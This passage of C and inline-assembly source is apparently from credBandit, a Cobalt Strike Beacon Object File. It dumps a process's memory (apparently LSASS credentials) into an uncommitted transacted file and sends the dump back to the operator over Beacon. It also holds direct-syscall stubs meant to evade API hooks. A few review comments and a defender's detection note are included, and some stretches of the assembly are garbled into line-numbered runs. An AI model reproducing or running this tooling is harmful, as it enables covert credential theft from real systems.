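    //Create MiniDump using ReactOS minidumpwritedump code
    success = MiniDumpWriteDumpA(hProc, PID, hFile);
    if (!success) {
        BeaconPrintf(CALLBACK_OUTPUT, "[-] MiniDump failed. GetLastError = (%ld)\n", KERNEL32$GetLastError());
        goto cleanup;
    }
    BeaconPrintf(CALLBACK_OUTPUT, "[+] MiniDump written to memory\n");

    //Get size of MiniDump
    if (!KERNEL32$GetFileSizeEx(hFile, &fs) || fs.QuadPart <= 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] GetFileSizeEx failed or dump is empty. GetLastError = (%ld)\n", KERNEL32$GetLastError());
        goto cleanup;
    }
    fileSize = (unsigned long long)fs.QuadPart;
    BeaconPrintf(CALLBACK_OUTPUT, "[+] MiniDump Size In Bytes = %I64u\n", fileSize);

    //Create mapped file and read dump contents into buffer (maximum size 0 = whole file)
    largeInteger.QuadPart = 0;
    status = NtCreateSection(&mapFile, SECTION_MAP_READ, 0, &largeInteger, PAGE_READONLY, SEC_COMMIT, hFile);
    if (status != 0) {
        BeaconPrintf(CALLBACK_OUTPUT, "[-] NtCreateSection failed with status %lx\n", status);
        goto cleanup;
    }
    BeaconPrintf(CALLBACK_OUTPUT, "[+] NtCreateSection created\n");

    status = NtMapViewOfSection(mapFile, (HANDLE)-1, &returnData, 0, 0, 0, &ViewSize, ViewUnmap, 0, PAGE_READONLY);
    if (status != 0) {
        BeaconPrintf(CALLBACK_OUTPUT, "[-] NtMapViewOfSection failed with status %lx\n", status);
        goto cleanup;
    }
    BeaconPrintf(CALLBACK_OUTPUT, "[+] NtMapViewOfSection successful\n");

    /*Note: At this point returnData holds our memory dump -> You could choose to encrypt it, compress it, write it to disk somwhere, whatever. You do you but we are going to download it via beacons native download API*/

    //If no output name is provided, the format will be "Mem:\[pid].dmp"
    if (outputFile && outputFileLength > 0) {
        //User provided a name; %.*s keeps the copy within the packed length even if the string were unterminated
        fileNameLength = MSVCRT$_snprintf(fileName, sizeof(fileName), "mem:\\%.*s.dmp", outputFileLength, outputFile);
    } else {
        //No name was provided, so we will use the pid as the basename
        fileNameLength = MSVCRT$_snprintf(fileName, sizeof(fileName), "mem:\\%d.dmp", PID);
    }
    if (fileNameLength < 0 || fileNameLength >= (int)sizeof(fileName)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Output name too long\n");
        goto cleanup;
    }

    //Download memory dump (the length excludes the terminator, as before)
    downloadFile(fileName, fileNameLength, returnData, fileSize);

cleanup:
    //NOTE(review): the view at returnData is left mapped — no NtUnmapViewOfSection
    //stub is visible in this file — but the section, file, transaction and process
    //handles are all released here.
    if (txSet)
        RtlSetCurrentTransaction(0);
    if (mapFile)
        NtClose(mapFile);
    if (hFile)
        NtClose(hFile);
    if (tFile)
        NtClose(tFile);     /* never committed, so the file goes away with the transaction */
    if (hProc)
        NtClose(hProc);
}
--------------------------------------------------------------------------------
/src/syscalls-asm.h:
--------------------------------------------------------------------------------
#pragma once
#include "syscalls.h"

#define ZwCreateFile NtCreateFile
__asm__("NtCreateFile: \n\
    mov rax, gs:[0x60] \n\
NtCreateFile_Check_X_X_XXXX: \n\
    cmp dword ptr [rax+0x118], 6 \n\
    je NtCreateFile_Check_6_X_XXXX \n\
    cmp dword ptr [rax+0x118], 10 \n\
    je NtCreateFile_Check_10_0_XXXX \n\
    jmp NtCreateFile_SystemCall_Unknown \n\
NtCreateFile_Check_6_X_XXXX: \n\
    cmp dword ptr [rax+0x11c], 1 \n\
    je NtCreateFile_Check_6_1_XXXX \n\
    cmp dword ptr [rax+0x11c], 2 \n\
    je NtCreateFile_SystemCall_6_2_XXXX \n\
    cmp dword ptr [rax+0x11c], 3 \n\
    je NtCreateFile_SystemCall_6_3_XXXX \n\
    jmp NtCreateFile_SystemCall_Unknown \n\
NtCreateFile_Check_6_1_XXXX: \n\
    cmp word ptr [rax+0x120], 7600 \n\
    je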
NtCreateFile_SystemCall_6_1_7600 \n\ 24 | cmp word ptr [rax+0x120], 7601 \n\ 25 | je NtCreateFile_SystemCall_6_1_7601 \n\ 26 | jmp NtCreateFile_SystemCall_Unknown \n\ 27 | NtCreateFile_Check_10_0_XXXX: \n\ 28 | cmp word ptr [rax+0x120], 10240 \n\ 29 | je NtCreateFile_SystemCall_10_0_10240 \n\ 30 | cmp word ptr [rax+0x120], 10586 \n\ 31 | je NtCreateFile_SystemCall_10_0_10586 \n\ 32 | cmp word ptr [rax+0x120], 14393 \n\ 33 | je NtCreateFile_SystemCall_10_0_14393 \n\ 34 | cmp word ptr [rax+0x120], 15063 \n\ 35 | je NtCreateFile_SystemCall_10_0_15063 \n\ 36 | cmp word ptr [rax+0x120], 16299 \n\ 37 | je NtCreateFile_SystemCall_10_0_16299 \n\ 38 | cmp word ptr [rax+0x120], 17134 \n\ 39 | je NtCreateFile_SystemCall_10_0_17134 \n\ 40 | cmp word ptr [rax+0x120], 17763 \n\ 41 | je NtCreateFile_SystemCall_10_0_17763 \n\ 42 | cmp word ptr [rax+0x120], 18362 \n\ 43 | je NtCreateFile_SystemCall_10_0_18362 \n\ 44 | cmp word ptr [rax+0x120], 18363 \n\ 45 | je NtCreateFile_SystemCall_10_0_18363 \n\ 46 | cmp word ptr [rax+0x120], 19041 \n\ 47 | je NtCreateFile_SystemCall_10_0_19041 \n\ 48 | cmp word ptr [rax+0x120], 19042 \n\ 49 | je NtCreateFile_SystemCall_10_0_19042 \n\ 50 | jmp NtCreateFile_SystemCall_Unknown \n\ 51 | NtCreateFile_SystemCall_6_1_7600: \n\ 52 | mov eax, 0x0052 \n\ 53 | jmp NtCreateFile_Epilogue \n\ 54 | NtCreateFile_SystemCall_6_1_7601: \n\ 55 | mov eax, 0x0052 \n\ 56 | jmp NtCreateFile_Epilogue \n\ 57 | NtCreateFile_SystemCall_6_2_XXXX: \n\ 58 | mov eax, 0x0053 \n\ 59 | jmp NtCreateFile_Epilogue \n\ 60 | NtCreateFile_SystemCall_6_3_XXXX: \n\ 61 | mov eax, 0x0054 \n\ 62 | jmp NtCreateFile_Epilogue \n\ 63 | NtCreateFile_SystemCall_10_0_10240: \n\ 64 | mov eax, 0x0055 \n\ 65 | jmp NtCreateFile_Epilogue \n\ 66 | NtCreateFile_SystemCall_10_0_10586: \n\ 67 | mov eax, 0x0055 \n\ 68 | jmp NtCreateFile_Epilogue \n\ 69 | NtCreateFile_SystemCall_10_0_14393: \n\ 70 | mov eax, 0x0055 \n\ 71 | jmp NtCreateFile_Epilogue \n\ 72 | NtCreateFile_SystemCall_10_0_15063: \n\ 73 | mov 
eax, 0x0055 \n\
    jmp NtCreateFile_Epilogue \n\
NtCreateFile_SystemCall_10_0_16299: \n\
    mov eax, 0x0055 \n\
    jmp NtCreateFile_Epilogue \n\
NtCreateFile_SystemCall_10_0_17134: \n\
    mov eax, 0x0055 \n\
    jmp NtCreateFile_Epilogue \n\
NtCreateFile_SystemCall_10_0_17763: \n\
    mov eax, 0x0055 \n\
    jmp NtCreateFile_Epilogue \n\
NtCreateFile_SystemCall_10_0_18362: \n\
    mov eax, 0x0055 \n\
    jmp NtCreateFile_Epilogue \n\
NtCreateFile_SystemCall_10_0_18363: \n\
    mov eax, 0x0055 \n\
    jmp NtCreateFile_Epilogue \n\
NtCreateFile_SystemCall_10_0_19041: \n\
    mov eax, 0x0055 \n\
    jmp NtCreateFile_Epilogue \n\
NtCreateFile_SystemCall_10_0_19042: \n\
    mov eax, 0x0055 \n\
    jmp NtCreateFile_Epilogue \n\
NtCreateFile_SystemCall_Unknown: \n\
    ret \n\
NtCreateFile_Epilogue: \n\
    mov r10, rcx \n\
    syscall \n\
    ret \n\
");

/*
 * Direct-syscall stubs (SysWhispers-style), one per Nt* routine in this
 * header. Each stub loads gs:[0x60] (the PEB on x64) and dispatches on the
 * dwords at +0x118 / +0x11c and the word at +0x120 — presumably
 * OSMajorVersion / OSMinorVersion / OSBuildNumber — to put the build-specific
 * service number in eax before `syscall`. Two caveats for operators:
 *  - only 6.1 builds 7600/7601, 6.2, 6.3 and 10.0 builds 10240..19042 are
 *    listed; any other build (later Windows 10, Windows 11) takes the
 *    `_SystemCall_Unknown` path, which is a bare `ret`;
 *  - that path never issues the syscall and returns with rax still holding the
 *    PEB pointer, so the caller sees a non-zero value that is not an NTSTATUS
 *    and its output parameters untouched. The callers in credBandit.c treat
 *    any non-zero status as failure, so this fails closed, but the status they
 *    print on such a build is meaningless.
 */
#define ZwCreateSection NtCreateSection
__asm__("NtCreateSection: \n\
    mov rax, gs:[0x60] \n\
NtCreateSection_Check_X_X_XXXX: \n\
    cmp dword ptr [rax+0x118], 6 \n\
    je NtCreateSection_Check_6_X_XXXX \n\
    cmp dword ptr [rax+0x118], 10 \n\
    je NtCreateSection_Check_10_0_XXXX \n\
    jmp NtCreateSection_SystemCall_Unknown \n\
NtCreateSection_Check_6_X_XXXX: \n\
    cmp dword ptr [rax+0x11c], 1 \n\
    je NtCreateSection_Check_6_1_XXXX \n\
    cmp dword ptr [rax+0x11c], 2 \n\
    je NtCreateSection_SystemCall_6_2_XXXX \n\
    cmp dword ptr [rax+0x11c], 3 \n\
    je NtCreateSection_SystemCall_6_3_XXXX \n\
    jmp NtCreateSection_SystemCall_Unknown \n\
NtCreateSection_Check_6_1_XXXX: \n\
    cmp word ptr [rax+0x120], 7600 \n\
    je NtCreateSection_SystemCall_6_1_7600 \n\
    cmp word ptr [rax+0x120], 7601 \n\
    je NtCreateSection_SystemCall_6_1_7601 \n\
    jmp NtCreateSection_SystemCall_Unknown \n\
NtCreateSection_Check_10_0_XXXX: \n\
    cmp word ptr
[rax+0x120], 10240 \n\ 129 | je NtCreateSection_SystemCall_10_0_10240 \n\ 130 | cmp word ptr [rax+0x120], 10586 \n\ 131 | je NtCreateSection_SystemCall_10_0_10586 \n\ 132 | cmp word ptr [rax+0x120], 14393 \n\ 133 | je NtCreateSection_SystemCall_10_0_14393 \n\ 134 | cmp word ptr [rax+0x120], 15063 \n\ 135 | je NtCreateSection_SystemCall_10_0_15063 \n\ 136 | cmp word ptr [rax+0x120], 16299 \n\ 137 | je NtCreateSection_SystemCall_10_0_16299 \n\ 138 | cmp word ptr [rax+0x120], 17134 \n\ 139 | je NtCreateSection_SystemCall_10_0_17134 \n\ 140 | cmp word ptr [rax+0x120], 17763 \n\ 141 | je NtCreateSection_SystemCall_10_0_17763 \n\ 142 | cmp word ptr [rax+0x120], 18362 \n\ 143 | je NtCreateSection_SystemCall_10_0_18362 \n\ 144 | cmp word ptr [rax+0x120], 18363 \n\ 145 | je NtCreateSection_SystemCall_10_0_18363 \n\ 146 | cmp word ptr [rax+0x120], 19041 \n\ 147 | je NtCreateSection_SystemCall_10_0_19041 \n\ 148 | cmp word ptr [rax+0x120], 19042 \n\ 149 | je NtCreateSection_SystemCall_10_0_19042 \n\ 150 | jmp NtCreateSection_SystemCall_Unknown \n\ 151 | NtCreateSection_SystemCall_6_1_7600: \n\ 152 | mov eax, 0x0047 \n\ 153 | jmp NtCreateSection_Epilogue \n\ 154 | NtCreateSection_SystemCall_6_1_7601: \n\ 155 | mov eax, 0x0047 \n\ 156 | jmp NtCreateSection_Epilogue \n\ 157 | NtCreateSection_SystemCall_6_2_XXXX: \n\ 158 | mov eax, 0x0048 \n\ 159 | jmp NtCreateSection_Epilogue \n\ 160 | NtCreateSection_SystemCall_6_3_XXXX: \n\ 161 | mov eax, 0x0049 \n\ 162 | jmp NtCreateSection_Epilogue \n\ 163 | NtCreateSection_SystemCall_10_0_10240: \n\ 164 | mov eax, 0x004a \n\ 165 | jmp NtCreateSection_Epilogue \n\ 166 | NtCreateSection_SystemCall_10_0_10586: \n\ 167 | mov eax, 0x004a \n\ 168 | jmp NtCreateSection_Epilogue \n\ 169 | NtCreateSection_SystemCall_10_0_14393: \n\ 170 | mov eax, 0x004a \n\ 171 | jmp NtCreateSection_Epilogue \n\ 172 | NtCreateSection_SystemCall_10_0_15063: \n\ 173 | mov eax, 0x004a \n\ 174 | jmp NtCreateSection_Epilogue \n\ 175 | 
NtCreateSection_SystemCall_10_0_16299: \n\ 176 | mov eax, 0x004a \n\ 177 | jmp NtCreateSection_Epilogue \n\ 178 | NtCreateSection_SystemCall_10_0_17134: \n\ 179 | mov eax, 0x004a \n\ 180 | jmp NtCreateSection_Epilogue \n\ 181 | NtCreateSection_SystemCall_10_0_17763: \n\ 182 | mov eax, 0x004a \n\ 183 | jmp NtCreateSection_Epilogue \n\ 184 | NtCreateSection_SystemCall_10_0_18362: \n\ 185 | mov eax, 0x004a \n\ 186 | jmp NtCreateSection_Epilogue \n\ 187 | NtCreateSection_SystemCall_10_0_18363: \n\ 188 | mov eax, 0x004a \n\ 189 | jmp NtCreateSection_Epilogue \n\ 190 | NtCreateSection_SystemCall_10_0_19041: \n\ 191 | mov eax, 0x004a \n\ 192 | jmp NtCreateSection_Epilogue \n\ 193 | NtCreateSection_SystemCall_10_0_19042: \n\ 194 | mov eax, 0x004a \n\ 195 | jmp NtCreateSection_Epilogue \n\ 196 | NtCreateSection_SystemCall_Unknown: \n\ 197 | ret \n\ 198 | NtCreateSection_Epilogue: \n\ 199 | mov r10, rcx \n\ 200 | syscall \n\ 201 | ret \n\ 202 | "); 203 | 204 | #define ZwCreateTransaction NtCreateTransaction 205 | __asm__("NtCreateTransaction: \n\ 206 | mov rax, gs:[0x60] \n\ 207 | NtCreateTransaction_Check_X_X_XXXX: \n\ 208 | cmp dword ptr [rax+0x118], 6 \n\ 209 | je NtCreateTransaction_Check_6_X_XXXX \n\ 210 | cmp dword ptr [rax+0x118], 10 \n\ 211 | je NtCreateTransaction_Check_10_0_XXXX \n\ 212 | jmp NtCreateTransaction_SystemCall_Unknown \n\ 213 | NtCreateTransaction_Check_6_X_XXXX: \n\ 214 | cmp dword ptr [rax+0x11c], 1 \n\ 215 | je NtCreateTransaction_Check_6_1_XXXX \n\ 216 | cmp dword ptr [rax+0x11c], 2 \n\ 217 | je NtCreateTransaction_SystemCall_6_2_XXXX \n\ 218 | cmp dword ptr [rax+0x11c], 3 \n\ 219 | je NtCreateTransaction_SystemCall_6_3_XXXX \n\ 220 | jmp NtCreateTransaction_SystemCall_Unknown \n\ 221 | NtCreateTransaction_Check_6_1_XXXX: \n\ 222 | cmp word ptr [rax+0x120], 7600 \n\ 223 | je NtCreateTransaction_SystemCall_6_1_7600 \n\ 224 | cmp word ptr [rax+0x120], 7601 \n\ 225 | je NtCreateTransaction_SystemCall_6_1_7601 \n\ 226 | jmp 
NtCreateTransaction_SystemCall_Unknown \n\ 227 | NtCreateTransaction_Check_10_0_XXXX: \n\ 228 | cmp word ptr [rax+0x120], 10240 \n\ 229 | je NtCreateTransaction_SystemCall_10_0_10240 \n\ 230 | cmp word ptr [rax+0x120], 10586 \n\ 231 | je NtCreateTransaction_SystemCall_10_0_10586 \n\ 232 | cmp word ptr [rax+0x120], 14393 \n\ 233 | je NtCreateTransaction_SystemCall_10_0_14393 \n\ 234 | cmp word ptr [rax+0x120], 15063 \n\ 235 | je NtCreateTransaction_SystemCall_10_0_15063 \n\ 236 | cmp word ptr [rax+0x120], 16299 \n\ 237 | je NtCreateTransaction_SystemCall_10_0_16299 \n\ 238 | cmp word ptr [rax+0x120], 17134 \n\ 239 | je NtCreateTransaction_SystemCall_10_0_17134 \n\ 240 | cmp word ptr [rax+0x120], 17763 \n\ 241 | je NtCreateTransaction_SystemCall_10_0_17763 \n\ 242 | cmp word ptr [rax+0x120], 18362 \n\ 243 | je NtCreateTransaction_SystemCall_10_0_18362 \n\ 244 | cmp word ptr [rax+0x120], 18363 \n\ 245 | je NtCreateTransaction_SystemCall_10_0_18363 \n\ 246 | cmp word ptr [rax+0x120], 19041 \n\ 247 | je NtCreateTransaction_SystemCall_10_0_19041 \n\ 248 | cmp word ptr [rax+0x120], 19042 \n\ 249 | je NtCreateTransaction_SystemCall_10_0_19042 \n\ 250 | jmp NtCreateTransaction_SystemCall_Unknown \n\ 251 | NtCreateTransaction_SystemCall_6_1_7600: \n\ 252 | mov eax, 0x00a8 \n\ 253 | jmp NtCreateTransaction_Epilogue \n\ 254 | NtCreateTransaction_SystemCall_6_1_7601: \n\ 255 | mov eax, 0x00a8 \n\ 256 | jmp NtCreateTransaction_Epilogue \n\ 257 | NtCreateTransaction_SystemCall_6_2_XXXX: \n\ 258 | mov eax, 0x00b3 \n\ 259 | jmp NtCreateTransaction_Epilogue \n\ 260 | NtCreateTransaction_SystemCall_6_3_XXXX: \n\ 261 | mov eax, 0x00b5 \n\ 262 | jmp NtCreateTransaction_Epilogue \n\ 263 | NtCreateTransaction_SystemCall_10_0_10240: \n\ 264 | mov eax, 0x00b8 \n\ 265 | jmp NtCreateTransaction_Epilogue \n\ 266 | NtCreateTransaction_SystemCall_10_0_10586: \n\ 267 | mov eax, 0x00b9 \n\ 268 | jmp NtCreateTransaction_Epilogue \n\ 269 | NtCreateTransaction_SystemCall_10_0_14393: \n\ 270 | mov 
eax, 0x00bb \n\
    jmp NtCreateTransaction_Epilogue \n\
NtCreateTransaction_SystemCall_10_0_15063: \n\
    mov eax, 0x00be \n\
    jmp NtCreateTransaction_Epilogue \n\
NtCreateTransaction_SystemCall_10_0_16299: \n\
    mov eax, 0x00bf \n\
    jmp NtCreateTransaction_Epilogue \n\
NtCreateTransaction_SystemCall_10_0_17134: \n\
    mov eax, 0x00c0 \n\
    jmp NtCreateTransaction_Epilogue \n\
NtCreateTransaction_SystemCall_10_0_17763: \n\
    mov eax, 0x00c1 \n\
    jmp NtCreateTransaction_Epilogue \n\
NtCreateTransaction_SystemCall_10_0_18362: \n\
    mov eax, 0x00c2 \n\
    jmp NtCreateTransaction_Epilogue \n\
NtCreateTransaction_SystemCall_10_0_18363: \n\
    mov eax, 0x00c2 \n\
    jmp NtCreateTransaction_Epilogue \n\
NtCreateTransaction_SystemCall_10_0_19041: \n\
    mov eax, 0x00c6 \n\
    jmp NtCreateTransaction_Epilogue \n\
NtCreateTransaction_SystemCall_10_0_19042: \n\
    mov eax, 0x00c6 \n\
    jmp NtCreateTransaction_Epilogue \n\
NtCreateTransaction_SystemCall_Unknown: \n\
    ret \n\
NtCreateTransaction_Epilogue: \n\
    mov r10, rcx \n\
    syscall \n\
    ret \n\
");

/*
 * Direct-syscall stubs, one per Nt* routine.  Every stub below has the same
 * shape:
 *   1. load the PEB pointer from the TEB (gs:[0x60] on x64) into rax;
 *   2. dispatch on the PEB version fields -- dword at +0x118 (OSMajorVersion,
 *      6 or 10), dword at +0x11c (OSMinorVersion, 1/2/3) and word at +0x120
 *      (OSBuildNumber) -- to a label that loads the build-specific syscall
 *      number into eax;
 *   3. epilogue: mov r10, rcx / syscall / ret, the x64 NT system-call
 *      sequence (syscall clobbers rcx, so the first argument is passed in r10).
 * Each Zw* name is a plain #define alias for the matching Nt* stub, so both
 * names resolve to the same dispatch table.
 *
 * NOTE(review): on every *_SystemCall_Unknown path the stub returns with rax
 * still holding the PEB pointer loaded in step 1.  A caller that treats the
 * return value as an NTSTATUS therefore sees an arbitrary non-zero value rather
 * than a defined failure status, so an unlisted build fails without an
 * identifiable error; setting eax to a defined status before that `ret` would
 * make the failure diagnosable.
 * NOTE(review): the build tables end at 19042; any newer build falls through to
 * the Unknown path above.  The numbers are taken as given and are not
 * re-verified here.
 * Defender's note: the `syscall` instruction in each epilogue executes from
 * memory that is not backed by ntdll.dll, which is the property call-stack and
 * return-address checks at the syscall boundary key on to detect this pattern.
 */

/* NtMapViewOfSection: 0x0025 (6.1), 0x0026 (6.2), 0x0027 (6.3), 0x0028 (all listed Win10 builds). */
#define ZwMapViewOfSection NtMapViewOfSection
__asm__("NtMapViewOfSection: \n\
    mov rax, gs:[0x60] \n\
NtMapViewOfSection_Check_X_X_XXXX: \n\
    cmp dword ptr [rax+0x118], 6 \n\
    je NtMapViewOfSection_Check_6_X_XXXX \n\
    cmp dword ptr [rax+0x118], 10 \n\
    je NtMapViewOfSection_Check_10_0_XXXX \n\
    jmp NtMapViewOfSection_SystemCall_Unknown \n\
NtMapViewOfSection_Check_6_X_XXXX: \n\
    cmp dword ptr [rax+0x11c], 1 \n\
    je NtMapViewOfSection_Check_6_1_XXXX \n\
    cmp dword ptr [rax+0x11c], 2 \n\
    je NtMapViewOfSection_SystemCall_6_2_XXXX \n\
    cmp dword ptr [rax+0x11c], 3 \n\
    je NtMapViewOfSection_SystemCall_6_3_XXXX \n\
    jmp NtMapViewOfSection_SystemCall_Unknown \n\
NtMapViewOfSection_Check_6_1_XXXX: \n\
    cmp word ptr [rax+0x120], 7600 \n\
    je NtMapViewOfSection_SystemCall_6_1_7600 \n\
    cmp word ptr [rax+0x120], 7601 \n\
    je NtMapViewOfSection_SystemCall_6_1_7601 \n\
    jmp NtMapViewOfSection_SystemCall_Unknown \n\
NtMapViewOfSection_Check_10_0_XXXX: \n\
    cmp word ptr [rax+0x120], 10240 \n\
    je NtMapViewOfSection_SystemCall_10_0_10240 \n\
    cmp word ptr [rax+0x120], 10586 \n\
    je NtMapViewOfSection_SystemCall_10_0_10586 \n\
    cmp word ptr [rax+0x120], 14393 \n\
    je NtMapViewOfSection_SystemCall_10_0_14393 \n\
    cmp word ptr [rax+0x120], 15063 \n\
    je NtMapViewOfSection_SystemCall_10_0_15063 \n\
    cmp word ptr [rax+0x120], 16299 \n\
    je NtMapViewOfSection_SystemCall_10_0_16299 \n\
    cmp word ptr [rax+0x120], 17134 \n\
    je NtMapViewOfSection_SystemCall_10_0_17134 \n\
    cmp word ptr [rax+0x120], 17763 \n\
    je NtMapViewOfSection_SystemCall_10_0_17763 \n\
    cmp word ptr [rax+0x120], 18362 \n\
    je NtMapViewOfSection_SystemCall_10_0_18362 \n\
    cmp word ptr [rax+0x120], 18363 \n\
    je NtMapViewOfSection_SystemCall_10_0_18363 \n\
    cmp word ptr [rax+0x120], 19041 \n\
    je NtMapViewOfSection_SystemCall_10_0_19041 \n\
    cmp word ptr [rax+0x120], 19042 \n\
    je NtMapViewOfSection_SystemCall_10_0_19042 \n\
    jmp NtMapViewOfSection_SystemCall_Unknown \n\
NtMapViewOfSection_SystemCall_6_1_7600: \n\
    mov eax, 0x0025 \n\
    jmp NtMapViewOfSection_Epilogue \n\
NtMapViewOfSection_SystemCall_6_1_7601: \n\
    mov eax, 0x0025 \n\
    jmp NtMapViewOfSection_Epilogue \n\
NtMapViewOfSection_SystemCall_6_2_XXXX: \n\
    mov eax, 0x0026 \n\
    jmp NtMapViewOfSection_Epilogue \n\
NtMapViewOfSection_SystemCall_6_3_XXXX: \n\
    mov eax, 0x0027 \n\
    jmp NtMapViewOfSection_Epilogue \n\
NtMapViewOfSection_SystemCall_10_0_10240: \n\
    mov eax, 0x0028 \n\
    jmp NtMapViewOfSection_Epilogue \n\
NtMapViewOfSection_SystemCall_10_0_10586: \n\
    mov eax, 0x0028 \n\
    jmp NtMapViewOfSection_Epilogue \n\
NtMapViewOfSection_SystemCall_10_0_14393: \n\
    mov eax, 0x0028 \n\
    jmp NtMapViewOfSection_Epilogue \n\
NtMapViewOfSection_SystemCall_10_0_15063: \n\
    mov eax, 0x0028 \n\
    jmp NtMapViewOfSection_Epilogue \n\
NtMapViewOfSection_SystemCall_10_0_16299: \n\
    mov eax, 0x0028 \n\
    jmp NtMapViewOfSection_Epilogue \n\
NtMapViewOfSection_SystemCall_10_0_17134: \n\
    mov eax, 0x0028 \n\
    jmp NtMapViewOfSection_Epilogue \n\
NtMapViewOfSection_SystemCall_10_0_17763: \n\
    mov eax, 0x0028 \n\
    jmp NtMapViewOfSection_Epilogue \n\
NtMapViewOfSection_SystemCall_10_0_18362: \n\
    mov eax, 0x0028 \n\
    jmp NtMapViewOfSection_Epilogue \n\
NtMapViewOfSection_SystemCall_10_0_18363: \n\
    mov eax, 0x0028 \n\
    jmp NtMapViewOfSection_Epilogue \n\
NtMapViewOfSection_SystemCall_10_0_19041: \n\
    mov eax, 0x0028 \n\
    jmp NtMapViewOfSection_Epilogue \n\
NtMapViewOfSection_SystemCall_10_0_19042: \n\
    mov eax, 0x0028 \n\
    jmp NtMapViewOfSection_Epilogue \n\
NtMapViewOfSection_SystemCall_Unknown: \n\
    ret \n\
NtMapViewOfSection_Epilogue: \n\
    mov r10, rcx \n\
    syscall \n\
    ret \n\
");

/* NtAdjustPrivilegesToken: 0x003e (6.1), 0x003f (6.2), 0x0040 (6.3), 0x0041 (all listed Win10 builds). */
#define ZwAdjustPrivilegesToken NtAdjustPrivilegesToken
__asm__("NtAdjustPrivilegesToken: \n\
    mov rax, gs:[0x60] \n\
NtAdjustPrivilegesToken_Check_X_X_XXXX: \n\
    cmp dword ptr [rax+0x118], 6 \n\
    je NtAdjustPrivilegesToken_Check_6_X_XXXX \n\
    cmp dword ptr [rax+0x118], 10 \n\
    je NtAdjustPrivilegesToken_Check_10_0_XXXX \n\
    jmp NtAdjustPrivilegesToken_SystemCall_Unknown \n\
NtAdjustPrivilegesToken_Check_6_X_XXXX: \n\
    cmp dword ptr [rax+0x11c], 1 \n\
    je NtAdjustPrivilegesToken_Check_6_1_XXXX \n\
    cmp dword ptr [rax+0x11c], 2 \n\
    je NtAdjustPrivilegesToken_SystemCall_6_2_XXXX \n\
    cmp dword ptr [rax+0x11c], 3 \n\
    je NtAdjustPrivilegesToken_SystemCall_6_3_XXXX \n\
    jmp NtAdjustPrivilegesToken_SystemCall_Unknown \n\
NtAdjustPrivilegesToken_Check_6_1_XXXX: \n\
    cmp word ptr [rax+0x120], 7600 \n\
    je NtAdjustPrivilegesToken_SystemCall_6_1_7600 \n\
    cmp word ptr [rax+0x120], 7601 \n\
    je NtAdjustPrivilegesToken_SystemCall_6_1_7601 \n\
    jmp NtAdjustPrivilegesToken_SystemCall_Unknown \n\
NtAdjustPrivilegesToken_Check_10_0_XXXX: \n\
    cmp word ptr [rax+0x120], 10240 \n\
    je NtAdjustPrivilegesToken_SystemCall_10_0_10240 \n\
    cmp word ptr [rax+0x120], 10586 \n\
    je NtAdjustPrivilegesToken_SystemCall_10_0_10586 \n\
    cmp word ptr [rax+0x120], 14393 \n\
    je NtAdjustPrivilegesToken_SystemCall_10_0_14393 \n\
    cmp word ptr [rax+0x120], 15063 \n\
    je NtAdjustPrivilegesToken_SystemCall_10_0_15063 \n\
    cmp word ptr [rax+0x120], 16299 \n\
    je NtAdjustPrivilegesToken_SystemCall_10_0_16299 \n\
    cmp word ptr [rax+0x120], 17134 \n\
    je NtAdjustPrivilegesToken_SystemCall_10_0_17134 \n\
    cmp word ptr [rax+0x120], 17763 \n\
    je NtAdjustPrivilegesToken_SystemCall_10_0_17763 \n\
    cmp word ptr [rax+0x120], 18362 \n\
    je NtAdjustPrivilegesToken_SystemCall_10_0_18362 \n\
    cmp word ptr [rax+0x120], 18363 \n\
    je NtAdjustPrivilegesToken_SystemCall_10_0_18363 \n\
    cmp word ptr [rax+0x120], 19041 \n\
    je NtAdjustPrivilegesToken_SystemCall_10_0_19041 \n\
    cmp word ptr [rax+0x120], 19042 \n\
    je NtAdjustPrivilegesToken_SystemCall_10_0_19042 \n\
    jmp NtAdjustPrivilegesToken_SystemCall_Unknown \n\
NtAdjustPrivilegesToken_SystemCall_6_1_7600: \n\
    mov eax, 0x003e \n\
    jmp NtAdjustPrivilegesToken_Epilogue \n\
NtAdjustPrivilegesToken_SystemCall_6_1_7601: \n\
    mov eax, 0x003e \n\
    jmp NtAdjustPrivilegesToken_Epilogue \n\
NtAdjustPrivilegesToken_SystemCall_6_2_XXXX: \n\
    mov eax, 0x003f \n\
    jmp NtAdjustPrivilegesToken_Epilogue \n\
NtAdjustPrivilegesToken_SystemCall_6_3_XXXX: \n\
    mov eax, 0x0040 \n\
    jmp NtAdjustPrivilegesToken_Epilogue \n\
NtAdjustPrivilegesToken_SystemCall_10_0_10240: \n\
    mov eax, 0x0041 \n\
    jmp NtAdjustPrivilegesToken_Epilogue \n\
NtAdjustPrivilegesToken_SystemCall_10_0_10586: \n\
    mov eax, 0x0041 \n\
    jmp NtAdjustPrivilegesToken_Epilogue \n\
NtAdjustPrivilegesToken_SystemCall_10_0_14393: \n\
    mov eax, 0x0041 \n\
    jmp NtAdjustPrivilegesToken_Epilogue \n\
NtAdjustPrivilegesToken_SystemCall_10_0_15063: \n\
    mov eax, 0x0041 \n\
    jmp NtAdjustPrivilegesToken_Epilogue \n\
NtAdjustPrivilegesToken_SystemCall_10_0_16299: \n\
    mov eax, 0x0041 \n\
    jmp NtAdjustPrivilegesToken_Epilogue \n\
NtAdjustPrivilegesToken_SystemCall_10_0_17134: \n\
    mov eax, 0x0041 \n\
    jmp NtAdjustPrivilegesToken_Epilogue \n\
NtAdjustPrivilegesToken_SystemCall_10_0_17763: \n\
    mov eax, 0x0041 \n\
    jmp NtAdjustPrivilegesToken_Epilogue \n\
NtAdjustPrivilegesToken_SystemCall_10_0_18362: \n\
    mov eax, 0x0041 \n\
    jmp NtAdjustPrivilegesToken_Epilogue \n\
NtAdjustPrivilegesToken_SystemCall_10_0_18363: \n\
    mov eax, 0x0041 \n\
    jmp NtAdjustPrivilegesToken_Epilogue \n\
NtAdjustPrivilegesToken_SystemCall_10_0_19041: \n\
    mov eax, 0x0041 \n\
    jmp NtAdjustPrivilegesToken_Epilogue \n\
NtAdjustPrivilegesToken_SystemCall_10_0_19042: \n\
    mov eax, 0x0041 \n\
    jmp NtAdjustPrivilegesToken_Epilogue \n\
NtAdjustPrivilegesToken_SystemCall_Unknown: \n\
    ret \n\
NtAdjustPrivilegesToken_Epilogue: \n\
    mov r10, rcx \n\
    syscall \n\
    ret \n\
");

/* NtReadVirtualMemory: 0x003c (6.1), 0x003d (6.2), 0x003e (6.3), 0x003f (all listed Win10 builds). */
#define ZwReadVirtualMemory NtReadVirtualMemory
